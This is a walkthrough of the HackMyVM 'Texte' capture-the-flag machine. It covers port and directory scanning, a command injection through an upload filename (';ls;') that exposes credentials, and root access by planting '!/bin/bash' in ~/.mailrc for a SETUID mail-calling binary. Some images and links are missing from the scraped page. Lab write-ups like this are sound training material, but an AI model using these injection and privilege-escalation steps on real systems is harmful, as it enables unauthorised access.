CTF Write Ups
  • HackMyVM
    • Alzheimer Write-Up
    • Breakout Write-Up
    • Canto Write-Up
    • Connection Write-Up
    • Dejavu Write-Up
    • Djinn Write-Up
    • Gift Write-Up
    • Hommie Write-Up
    • Hotel Write-Up
    • Publisher Write-Up
    • Pwned Write-Up
    • Quick Series Write-Ups
      • Quick 1 Write-Up
    • Texte Write-Up
    • Twisted Write-Up
    • Vulny Write-Up
Powered by GitBook
On this page
  • Introduction
  • TL;DR
  • Reconnaissance
  • Network/Port Scanning (Nmap)
  • Directory Brute-forcing (Gobuster)
  • Visiting Web Page (Port 80)
  • Exploitation
  • Command Injection Vulnerability
  • User (kamila) Access
  • Privilege Escalation
  1. HackMyVM

Texte Write-Up

PreviousQuick 1 Write-UpNextTwisted Write-Up

Last updated 7 months ago

Introduction

In this write-up, I will guide you through the steps I took to complete the HackMyVM - Texte CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Checkout the video (update this).

TL;DR

Reconnaissance

Network/Port Scanning (Nmap)

Command: 

nmap -sV -sC -vv -oA texte 172.16.100.32

Explanation:

  • nmap: Tool used to scan network and ports to discover which services are running.

  • -sV: Perform version detection of services.

  • -sC: Scan using default scripts.

  • -oA: Output in filename "texte".

  • 172.16.100.32: IP address of Texte VM on my network.

Output:

# Nmap 7.95 scan initiated Mon Oct 21 00:09:29 2024 as: nmap -sC -sV -vv -oA texte -p- 172.16.100.32
Nmap scan report for texte.home.com (172.16.100.32)
Host is up, received syn-ack (0.010s latency).
Scanned at 2024-10-21 00:09:33 PDT for 11s
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 40:eb:35:37:99:c2:91:25:38:2d:70:33:e2:7d:9a:c1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDC+acLx1Orx+rd+A3ov5J4ZKoFNNA2/3dl2M9S9Cztxye+6L5m7CkdiNcAJR+sbN0rtReUHeTmt83e7yghXAfrRhv+CyY0XHWGtb6laugus8LzCTZ1rwP4hksrhKSg0A8wTST1tJvEMM9e3Xdn9JYXQV10PczH/Xth1T13kBN7LEYRR3jgRj6CR5jLqp+ubQe8KgVh3uxT6SNtXRDWPfHau31BoAkODQRIrneRQT4izPp+jUm7txS+IvDJXgIGt75PgdrCcqKZkK3NxK5WKBWKFm86Xov0e1xg4ZpEev1aw9mCxPXEDslw21igWOVvCMVlq++NYcsamF7X1aya4iTM8BmzocESVI3v6W+lmazkyQ7sZtvE7cfoRU4OJB+vUjIhZO/dp44kTsT1f4wUFadf8Lj3rdLsxuLzI4wXu7ZS3yfnLRRuurjFeMXyLLBnXv8kmqmlvzZBDd+nRZJNM3a/ASkvh8gyJEh33HqK8fmzICy+RsgTapvdiFw9sTE2Ils=
|   256 35:a0:dc:63:24:db:23:b8:85:c1:4d:95:e8:bb:8f:ca (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF2VaLgWiBuzT3HbXfJP92ViyqgH1dcSjCpQVlauKGvjRuuJYFHYJb2mD2vNfVAy4uwN3freAMK7c/LXrZaHtT4=
|   256 4c:cb:02:1c:ae:b8:08:1a:5e:4a:a9:29:d1:13:e2:39 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIILXu+XQCkTLzBxMZRAdD3Xfp3NxmURWyqWzh610oP9z
80/tcp open  http    syn-ack nginx 1.18.0
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: TexteBoard
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 21 00:09:44 2024 -- 1 IP address (1 host up) scanned in 15.11 seconds

Findings:

We see that there is a web server running on port 80 and an SSH server on port 22 which I am assuming is for better shell access after we find the user password or private key.

Let's check out the web server and in the background we can run gobuster to brute force web directories.

Directory Brute-forcing (Gobuster)

While we brute force the directory of the website, we can check out the website on a browser. 

gobuster dir -u http://172.16.100.32 -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt | tee -a texte.gobuster

Note: I have setup an alias to run gobuster inside a docker container.

Alias:

alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'

Explanation:

  • dir: Mode of operation indicating directory/file enumeration.

  • -u http://172.16.101.88: Base URL of the target web server to scan.

  • -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Path of word list to use.

  • -x html,php,txt: File extension(s) to search for.

Output:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.100.32
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 476]
/upload.php           (Status: 200) [Size: 27]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

Findings:

We only find 2 pages and no hidden pages.

So let's just checkout the web page and its functionalities.

Visiting Web Page (Port 80)

We see a basic web page that has a file upload functionality. After trying, we understand that it only allows image formats to be uploaded such as .jpg, .png, etc.

And after uploading the image, it displays it as shown:

So, I started by trying to upload a PHP Reverse Shell with different file extensions but that did not work. The request only accepted image data, so I tried to inject PHP in an image.

Exploitation

Command Injection Vulnerability

So, I sent the following request:

and as you can see on line number 18, the filename is the payload:

;ls;

Below is the response I got for the above request:

which shows that there is another file hosted on the web server which we can access.

After visiting the following URL:

172.16.100.32/uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt

a file is downloaded with the following contents:

User (kamila) Access

We can try using these credentials for the SSH server we found earlier. And on doing so, we see that the credentials work and we have shell access for the user kamila.

Read the user.txt file to get the flag:

cat user.txt

Privilege Escalation

On running the first privilege escalation command:

sudo -l

we see that the machine does not have a sudo binary.

Next we check for SETUID capable binaries using the command:

find / -perm -g=s -type f 2>/dev/null

Output:

We see there is a /opt/texte binary which we can run as the root user because of the SETUID capability.

On checking the strings in the binary we see that it is invoking the following command:

/usr/bin/mail -s 'Remember,dont upload PHP files.' kamila@localhost

After some help from ChatGPT, I realised the way to execute shell commands is to add a ! before it in the ~/.mailrc file.

So, I created the ~/.mailrc file using the following command:

echo '!/bin/bash' > /home/kamila/.mailrc

After this, execute the /opt/texte binary to get the root shell as follows:

And finally, we can read the root flag:

cat /root/root.txt

I followed this to inject some PHP in the image but again to no avail.

So, after reading up more and reaching , I decided to try command injection in the filename.

Note: I refer for Privilege Escalation methods.

So, since it is invoking the mail binary, we need to somehow use that to elevate our privileges. I checked out the which mentions that we can add commands to the ~/.mailrc file which are executed whenever the mail program is executed.

here
amazingly well written and informational blog
this part in the HackTricks page
this GitHub page
man page for mail